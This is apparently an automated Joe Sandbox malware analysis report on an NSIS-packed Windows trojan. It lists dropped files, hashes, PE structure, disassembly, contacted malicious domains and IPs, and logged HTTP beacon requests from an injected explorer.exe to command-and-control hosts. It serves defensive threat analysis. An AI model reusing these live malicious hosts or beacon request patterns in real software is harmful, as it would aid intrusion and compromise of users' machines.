http://nsis.sf.net/NSIS_Error | Y1p8VPvyU2.exe | false | - | high
http://nsis.sf.net/NSIS_ErrorError | Y1p8VPvyU2.exe | false | - | high
https://browsehappy.com/ | cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp | false | - | high
http://www.tyjgfuke.com/$t | cscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tyjgfuke.com/n6fr/?r8Yhe8X=LSrsi9BeeNNPJfOX4A9nLsTLbEdx4M4dJGVYJBt | cscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://via.placeholder.com/100 | cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp | false | - | high

                                Contacted IPs


                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
34.102.136.180 | assisttm.com | United States | 15169 | GOOGLEUS | false
23.110.214.34 | www.tyjgfuke.com | United States | 395954 | LEASEWEB-USA-LAX-11US | true
45.8.125.8 | www.fastbest.host | Russian Federation | 49505 | SELECTELRU | true

                                General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 532909
Start date: 02.12.2021
Start time: 19:58:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 29s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Y1p8VPvyU2 (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/2@7/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 21.8% (good quality ratio 19.7%)
• Quality average: 74.7%
• Quality standard deviation: 31.6%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

Match | Associated Sample Name / URL | Detection | Context
www.fastbest.host | Medtronics Product catalog and prices_pdf.exe | malicious | 194.54.163.227

                                ASN


                                JA3 Fingerprints

                                No context

                                Dropped Files

Match | Associated Sample Name / URL | Detection | Context
C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll | product list.xlsx | malicious |
C:\Users\user\AppData\Local\Temp\6jgsfkran1lw1 | product list.xlsx | malicious |

                                    Created / dropped Files

C:\Users\user\AppData\Local\Temp\6jgsfkran1lw1
Process: C:\Users\user\Desktop\Y1p8VPvyU2.exe
File Type: DOS executable (COM, 0x8C-variant)
Category: dropped
Size (bytes): 217235
Entropy (8bit): 7.9937809161987765
Encrypted: true
SSDEEP: 6144:W4FmTjet9fxOzh9Ky33TDMfVwr37hQnll6V:GE9YzhogvMfm3olI
MD5: 75ACE7B8440CE829D653343E18EAE33A
SHA1: 09F23DD8962701C4D5213E2A7AA395985E8963DE
SHA-256: A4CAE10880D0DD180CC5B92E38F449EE244E83186725BD1257312DCC05AA4E48
SHA-512: F4BC54E1396D9AF6E61ED270B068D60475F357BD3258ABF4E659D75FD81D27D173BBB2126D646BA51736B3EA82CEC03F5D4A1D9D8FEFC6E1599333827B7AB2A0
Malicious: false
Joe Sandbox View:
• Filename: product list.xlsx, Detection: malicious
Reputation: low
C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll
Process: C:\Users\user\Desktop\Y1p8VPvyU2.exe
File Type: PE32 executable (DLL) (native) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 137728
Entropy (8bit): 6.411397085063496
Encrypted: false
SSDEEP: 1536:gmPsLrHeJTgGJPLlr0VOGfTRisu0/8UgCUoXD2/Y+z4o8QqbfvZ2BksWjcd8EmjN:sLz0gGJPprwr/dXDZE2Z2B8E8
MD5: 4881ED27473CD15B3FCC072F11465658
SHA1: 37A29E690965E233CA4B89538A77188DC2048BFF
SHA-256: 13FA843E8D2B2E3A9699F9F71A8AD152EA94995B1045891B6B91CFA9674B69F8
SHA-512: ED198137652861DB9A6595FEDC6E376EA2BC730E5D6BC8D58B203F07814200529597AD5B24EE8409942222CB18674DDE38422B82FFCD057E63ACC9233E6EAFF3
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:
• Filename: product list.xlsx, Detection: malicious
Reputation: low

                                    Static File Info

                                    General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.939366323187133
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Y1p8VPvyU2.exe
File size: 318467
MD5: 83be105c9fa2427bd6079f5d19659596
SHA1: 1430baa740d2cd40a507cbfa8fe62e3d78424315
SHA256: 8cd6125941710166af38133bce6cae9f9cc41c8d88ff774cd691081d193015a1
SHA512: 09a2c3c9d9b147e6c25d824c931b2c0f4f9daaccdbde4a28ad0955be63642e11cb23df8f1d85e719b2b0b535e55b0d2cfb7168312c0f082d8b4f9d1072efdd3e
SSDEEP: 6144:rGiw8TRbniXVRaPCuyCxGfYy33TGBbXU2gx7hQn+l6aFu00D/4e3aKize/q:bTwXVRACauYgFo+q0K4VKizR

                                    File Icon

Icon Hash: b2a88c96b2ca6a72

                                    Static PE Info

                                    General

Entrypoint: 0x4030e3
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 7fa974366048f9c551ef45714595665e

                                    Entrypoint Preview

                                    Instruction
                                    sub esp, 00000180h
                                    push ebx
                                    push ebp
                                    push esi
                                    xor ebx, ebx
                                    push edi
                                    mov dword ptr [esp+18h], ebx
                                    mov dword ptr [esp+10h], 00409158h
                                    xor esi, esi
                                    mov byte ptr [esp+14h], 00000020h
                                    call dword ptr [00407030h]
                                    push 00008001h
                                    call dword ptr [004070B0h]
                                    push ebx
                                    call dword ptr [0040727Ch]
                                    push 00000008h
                                    mov dword ptr [0042EC18h], eax
                                    call 00007F6505057D48h
                                    mov dword ptr [0042EB64h], eax
                                    push ebx
                                    lea eax, dword ptr [esp+34h]
                                    push 00000160h
                                    push eax
                                    push ebx
                                    push 00428F90h
                                    call dword ptr [00407158h]
                                    push 0040914Ch
                                    push 0042E360h
                                    call 00007F65050579FFh
                                    call dword ptr [004070ACh]
                                    mov edi, 00434000h
                                    push eax
                                    push edi
                                    call 00007F65050579EDh
                                    push ebx
                                    call dword ptr [0040710Ch]
                                    cmp byte ptr [00434000h], 00000022h
                                    mov dword ptr [0042EB60h], eax
                                    mov eax, edi
                                    jne 00007F650505522Ch
                                    mov byte ptr [esp+14h], 00000022h
                                    mov eax, 00434001h
                                    push dword ptr [esp+14h]
                                    push eax
                                    call 00007F65050574E0h
                                    push eax
                                    call dword ptr [0040721Ch]
                                    mov dword ptr [esp+1Ch], eax
                                    jmp 00007F6505055285h
                                    cmp cl, 00000020h
                                    jne 00007F6505055228h
                                    inc eax
                                    cmp byte ptr [eax], 00000020h
                                    je 00007F650505521Ch
                                    cmp byte ptr [eax], 00000022h
                                    mov byte ptr [eax+eax+00h], 00000000h

                                    Rich Headers

                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804

                                    Data Directories

                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74b0 | 0xb4 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x900 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                    Sections

                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x5b68 | 0x5c00 | False | 0.67722486413 | data | 6.48746502716 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x7000 | 0x129c | 0x1400 | False | 0.4337890625 | data | 5.04904254867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0x9000 | 0x25c58 | 0x400 | False | 0.58203125 | data | 4.76995537906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc | 0x37000 | 0x900 | 0xa00 | False | 0.4078125 | data | 3.93441125971 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    Name | RVA | Size | Type | Language | Country
                                    RT_ICON | 0x37190 | 0x2e8 | data | English | United States
                                    RT_DIALOG | 0x37478 | 0x100 | data | English | United States
                                    RT_DIALOG | 0x37578 | 0x11c | data | English | United States
                                    RT_DIALOG | 0x37698 | 0x60 | data | English | United States
                                    RT_GROUP_ICON | 0x376f8 | 0x14 | data | English | United States
                                    RT_MANIFEST | 0x37710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                    Imports

                                    DLL | Import
                                    KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                    USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                    GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                    SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                    ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                    COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                    ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                    VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                    Possible Origin

                                    Language of compilation system | Country where language is spoken
                                    English | United States

                                    Network Behavior

                                    Snort IDS Alerts

                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                    12/02/21-20:00:36.476668 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49777 | 34.102.136.180 | 192.168.2.3
                                    12/02/21-20:00:41.788599 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49793 | 34.102.136.180 | 192.168.2.3

                                    Network Port Distribution

                                    TCP Packets

                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Dec 2, 2021 20:00:36.216691971 CET | 49777 | 80 | 192.168.2.3 | 34.102.136.180
                                    Dec 2, 2021 20:00:36.233905077 CET | 80 | 49777 | 34.102.136.180 | 192.168.2.3
                                    Dec 2, 2021 20:00:36.234029055 CET | 49777 | 80 | 192.168.2.3 | 34.102.136.180
                                    Dec 2, 2021 20:00:36.234204054 CET | 49777 | 80 | 192.168.2.3 | 34.102.136.180
                                    Dec 2, 2021 20:00:36.251166105 CET | 80 | 49777 | 34.102.136.180 | 192.168.2.3
                                    Dec 2, 2021 20:00:36.476667881 CET | 80 | 49777 | 34.102.136.180 | 192.168.2.3
                                    Dec 2, 2021 20:00:36.476706028 CET | 80 | 49777 | 34.102.136.180 | 192.168.2.3
                                    Dec 2, 2021 20:00:36.476895094 CET | 49777 | 80 | 192.168.2.3 | 34.102.136.180
                                    Dec 2, 2021 20:00:36.476938963 CET | 49777 | 80 | 192.168.2.3 | 34.102.136.180
                                    Dec 2, 2021 20:00:36.786031008 CET | 49777 | 80 | 192.168.2.3 | 34.102.136.180
                                    Dec 2, 2021 20:00:36.804990053 CET | 80 | 49777 | 34.102.136.180 | 192.168.2.3
                                    Dec 2, 2021 20:00:41.523844957 CET | 49793 | 80 | 192.168.2.3 | 34.102.136.180
                                    Dec 2, 2021 20:00:41.543034077 CET | 80 | 49793 | 34.102.136.180 | 192.168.2.3
                                    Dec 2, 2021 20:00:41.543169975 CET | 49793 | 80 | 192.168.2.3 | 34.102.136.180
                                    Dec 2, 2021 20:00:41.543401957 CET | 49793 | 80 | 192.168.2.3 | 34.102.136.180
                                    Dec 2, 2021 20:00:41.562285900 CET | 80 | 49793 | 34.102.136.180 | 192.168.2.3
                                    Dec 2, 2021 20:00:41.788599014 CET | 80 | 49793 | 34.102.136.180 | 192.168.2.3
                                    Dec 2, 2021 20:00:41.788650990 CET | 80 | 49793 | 34.102.136.180 | 192.168.2.3
                                    Dec 2, 2021 20:00:41.788954020 CET | 49793 | 80 | 192.168.2.3 | 34.102.136.180
                                    Dec 2, 2021 20:00:41.789102077 CET | 49793 | 80 | 192.168.2.3 | 34.102.136.180
                                    Dec 2, 2021 20:00:41.808116913 CET | 80 | 49793 | 34.102.136.180 | 192.168.2.3
                                    Dec 2, 2021 20:00:52.034548998 CET | 49808 | 80 | 192.168.2.3 | 23.110.214.34
                                    Dec 2, 2021 20:00:55.037508965 CET | 49808 | 80 | 192.168.2.3 | 23.110.214.34
                                    Dec 2, 2021 20:01:01.038088083 CET | 49808 | 80 | 192.168.2.3 | 23.110.214.34
                                    Dec 2, 2021 20:01:16.960594893 CET | 49809 | 80 | 192.168.2.3 | 23.110.214.34
                                    Dec 2, 2021 20:01:18.362354040 CET | 49810 | 80 | 192.168.2.3 | 45.8.125.8
                                    Dec 2, 2021 20:01:18.433792114 CET | 80 | 49810 | 45.8.125.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:18.436881065 CET | 49810 | 80 | 192.168.2.3 | 45.8.125.8
                                    Dec 2, 2021 20:01:18.436930895 CET | 49810 | 80 | 192.168.2.3 | 45.8.125.8
                                    Dec 2, 2021 20:01:18.508413076 CET | 80 | 49810 | 45.8.125.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:18.510102034 CET | 80 | 49810 | 45.8.125.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:18.510129929 CET | 80 | 49810 | 45.8.125.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:18.510266066 CET | 80 | 49810 | 45.8.125.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:18.510354042 CET | 80 | 49810 | 45.8.125.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:18.510484934 CET | 80 | 49810 | 45.8.125.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:18.510514975 CET | 80 | 49810 | 45.8.125.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:18.510546923 CET | 80 | 49810 | 45.8.125.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:18.510771036 CET | 49810 | 80 | 192.168.2.3 | 45.8.125.8
                                    Dec 2, 2021 20:01:18.510786057 CET | 49810 | 80 | 192.168.2.3 | 45.8.125.8
                                    Dec 2, 2021 20:01:18.510788918 CET | 49810 | 80 | 192.168.2.3 | 45.8.125.8
                                    Dec 2, 2021 20:01:18.510791063 CET | 49810 | 80 | 192.168.2.3 | 45.8.125.8
                                    Dec 2, 2021 20:01:18.510792971 CET | 49810 | 80 | 192.168.2.3 | 45.8.125.8
                                    Dec 2, 2021 20:01:18.581895113 CET | 80 | 49810 | 45.8.125.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:19.968739033 CET | 49809 | 80 | 192.168.2.3 | 23.110.214.34
                                    Dec 2, 2021 20:01:25.969937086 CET | 49809 | 80 | 192.168.2.3 | 23.110.214.34

                                    UDP Packets

                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Dec 2, 2021 20:00:36.186220884 CET | 49572 | 53 | 192.168.2.3 | 8.8.8.8
                                    Dec 2, 2021 20:00:36.210366011 CET | 53 | 49572 | 8.8.8.8 | 192.168.2.3
                                    Dec 2, 2021 20:00:41.495348930 CET | 60823 | 53 | 192.168.2.3 | 8.8.8.8
                                    Dec 2, 2021 20:00:41.519289017 CET | 53 | 60823 | 8.8.8.8 | 192.168.2.3
                                    Dec 2, 2021 20:00:46.807691097 CET | 55102 | 53 | 192.168.2.3 | 8.8.8.8
                                    Dec 2, 2021 20:00:46.831301928 CET | 53 | 55102 | 8.8.8.8 | 192.168.2.3
                                    Dec 2, 2021 20:00:51.858485937 CET | 56527 | 53 | 192.168.2.3 | 8.8.8.8
                                    Dec 2, 2021 20:00:52.032300949 CET | 53 | 56527 | 8.8.8.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:16.770849943 CET | 49559 | 53 | 192.168.2.3 | 8.8.8.8
                                    Dec 2, 2021 20:01:16.942539930 CET | 53 | 49559 | 8.8.8.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:18.165642023 CET | 52650 | 53 | 192.168.2.3 | 8.8.8.8
                                    Dec 2, 2021 20:01:18.359935045 CET | 53 | 52650 | 8.8.8.8 | 192.168.2.3
                                    Dec 2, 2021 20:01:23.519859076 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
                                    Dec 2, 2021 20:01:23.555322886 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3

                                    DNS Queries

                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                    Dec 2, 2021 20:00:36.186220884 CET | 192.168.2.3 | 8.8.8.8 | 0x10ba | Standard query (0) | www.yr-golf.com | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:00:41.495348930 CET | 192.168.2.3 | 8.8.8.8 | 0xc7e4 | Standard query (0) | www.assisttm.com | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:00:46.807691097 CET | 192.168.2.3 | 8.8.8.8 | 0x498e | Standard query (0) | www.gsjbd1.club | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:00:51.858485937 CET | 192.168.2.3 | 8.8.8.8 | 0x9dd7 | Standard query (0) | www.tyjgfuke.com | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:01:16.770849943 CET | 192.168.2.3 | 8.8.8.8 | 0x9969 | Standard query (0) | www.tyjgfuke.com | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:01:18.165642023 CET | 192.168.2.3 | 8.8.8.8 | 0x7c7d | Standard query (0) | www.fastbest.host | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:01:23.519859076 CET | 192.168.2.3 | 8.8.8.8 | 0xe521 | Standard query (0) | www.caixadepandora.club | A (IP address) | IN (0x0001)

                                    DNS Answers

                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                    Dec 2, 2021 20:00:36.210366011 CET | 8.8.8.8 | 192.168.2.3 | 0x10ba | No error (0) | www.yr-golf.com | yr-golf.com |  | CNAME (Canonical name) | IN (0x0001)
                                    Dec 2, 2021 20:00:36.210366011 CET | 8.8.8.8 | 192.168.2.3 | 0x10ba | No error (0) | yr-golf.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:00:41.519289017 CET | 8.8.8.8 | 192.168.2.3 | 0xc7e4 | No error (0) | www.assisttm.com | assisttm.com |  | CNAME (Canonical name) | IN (0x0001)
                                    Dec 2, 2021 20:00:41.519289017 CET | 8.8.8.8 | 192.168.2.3 | 0xc7e4 | No error (0) | assisttm.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:00:46.831301928 CET | 8.8.8.8 | 192.168.2.3 | 0x498e | Name error (3) | www.gsjbd1.club | none | none | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:00:52.032300949 CET | 8.8.8.8 | 192.168.2.3 | 0x9dd7 | No error (0) | www.tyjgfuke.com |  | 23.110.214.34 | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:01:16.942539930 CET | 8.8.8.8 | 192.168.2.3 | 0x9969 | No error (0) | www.tyjgfuke.com |  | 23.110.214.34 | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:01:18.359935045 CET | 8.8.8.8 | 192.168.2.3 | 0x7c7d | No error (0) | www.fastbest.host |  | 45.8.125.8 | A (IP address) | IN (0x0001)
                                    Dec 2, 2021 20:01:23.555322886 CET | 8.8.8.8 | 192.168.2.3 | 0xe521 | No error (0) | www.caixadepandora.club |  | 137.184.111.224 | A (IP address) | IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.yr-golf.com
                                    • www.assisttm.com
                                    • www.fastbest.host

                                    HTTP Packets

                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    0 | 192.168.2.3 | 49777 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Dec 2, 2021 20:00:36.234204054 CET | 8401 | OUT | GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB HTTP/1.1
                                    Host: www.yr-golf.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Dec 2, 2021 20:00:36.476667881 CET | 8403 | IN | HTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Thu, 02 Dec 2021 19:00:36 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "61973ffe-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    1 | 192.168.2.3 | 49793 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Dec 2, 2021 20:00:41.543401957 CET | 8436 | OUT | GET /n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh HTTP/1.1
                                    Host: www.assisttm.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Dec 2, 2021 20:00:41.788599014 CET | 8437 | IN | HTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Thu, 02 Dec 2021 19:00:41 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "61a4f026-113"
                                    Via: 1.1 google
                                    Connection: close
